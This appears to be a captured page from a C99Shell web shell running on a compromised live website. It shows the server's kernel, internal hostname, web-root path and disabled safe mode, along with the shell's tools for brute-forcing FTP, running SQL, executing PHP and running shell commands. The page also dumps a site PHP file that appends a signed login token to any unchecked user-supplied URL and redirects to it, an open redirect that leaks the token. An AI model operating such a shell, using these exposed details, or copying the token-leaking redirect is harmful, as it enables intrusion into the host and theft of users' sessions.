itce.co.in - c99shell

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!
Software: nginx/1.24.0. PHP/7.3.32 uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 22:31:59 UTC 2025 x86_64 Safe-mode: OFF (not secure) /www/wwwroot/itce.co.in/itce.co.in/data/ drwxr-xr-x Free 30.74 GB of 49.93 GB (61.58%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/itce.co.in/data/ drwxr-xr-x
Free 30.74 GB of 49.93 GB (61.58%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

require_once("include/dbcommon.php");

require_once('classes/menupage.php');





if( !isLogged() || isLoggedAsGuest() ) 

{

    Security::tryRelogin();

}



if( !isLogged() )

{

    return;

}



$duration = postvalue( "duration" );

if( !$duration ) {

    $duration = 30;

}

$url =  postvalue( "url" );

if( !$url ) {

    return;

}



// todo 

// add url matching, so only allowed URLs are processed



$payload = array( 

    "username" => Security::getUserName(),

);

$jwt = jwt_encode( $payload, $duration );

if( strpos( $url, '?' ) !== false ) {

    $url .= "&token=" . $jwt;

} else {

    $url .= "?token=" . $jwt;

}

header("Location: " . $url );

?>

:: Command execute ::
Enter:	Select: